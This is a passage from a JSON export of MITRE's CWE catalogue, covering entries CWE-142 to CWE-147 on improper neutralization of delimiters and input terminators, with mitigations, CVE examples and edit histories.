denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2000-0293","Description":"Multiple internal space, insufficient quoting - program does not use proper delimiter between values.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0293"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Value Delimiter"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Embedded Delimiters&#34;, Page 408"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Value Delimiter","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Value Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"143":{"attr":{"@_ID":"143","@_Name":"Improper Neutralization of Record Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as record delimiters when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"140","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that record delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-1982","Description":"Carriage returns in subject field allow adding new records to data file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1982"},{"Reference":"CVE-2001-0527","Description":"Attacker inserts carriage returns and \\"|\\" field separator characters to add new user/privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0527"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Record Delimiter"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Embedded Delimiters&#34;, Page 408"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Record Delimiter","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Record Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"144":{"attr":{"@_ID":"144","@_Name":"Improper Neutralization of Line Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as line delimiters when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"140","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"93","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that line delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-0267","Description":"Linebreak in field of PHP script allows admin privileges when written to data file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0267"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Line Delimiter"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS03-J","Entry_Name":"Do not log unsanitized user input"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Embedded Delimiters&#34;, Page 408"}}},"Notes":{"Note":{"#text":"Depending on the language and syntax being used, this could be the same as the record delimiter (CWE-143).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Line Delimiter","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Line Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"145":{"attr":{"@_ID":"145","@_Name":"Improper Neutralization of Section Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as section delimiters when they are sent to a downstream component.","Extended_Description":{"xhtml:p":["As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions.","One example of a section delimiter is the boundary string in a multipart MIME message. In many cases, doubled line delimiters can serve as a section delimiter."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"140","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"93","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that section delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Section Delimiter"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Embedded Delimiters&#34;, Page 408"}}},"Notes":{"Note":{"#text":"Depending on the language and syntax being used, this could be the same as the record delimiter (CWE-143).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Section Delimiter","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Section Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"146":{"attr":{"@_ID":"146","@_Name":"Improper Neutralization of Expression/Command Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as expression or command delimiters when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"140","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":["Execute Unauthorized Code or Commands","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that inter-expression and inter-command delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Delimiter between Expressions or Commands"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"15"}},{"attr":{"@_CAPEC_ID":"6"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Embedded Delimiters&#34;, Page 408"}}},"Notes":{"Note":{"#text":"A shell metacharacter (covered in CWE-150) is one example of a potential delimiter that may need to be neutralized.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Applicable_Platforms, Description, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Delimiter between Expressions or Commands","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Expression/Command Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"147":{"attr":{"@_ID":"147","@_Name":"Improper Neutralization of Input Terminators","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as input terminators when they are sent to a downstream component.","Extended_Description":"For example, a \\".\\" in SMTP signifies the end of mail message data, whereas a null character can be used for the end of a string.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that terminators will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0319","Description":"MFV. mail server does not properly identify terminator string to signify end of message, causing corruption, possibly in conjunction with off-by-one error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0319"},{"Reference":"CVE-2000-0320","Description":"MFV. mail server does not properly identify terminator string to signify end of message, causing corruption, possibly 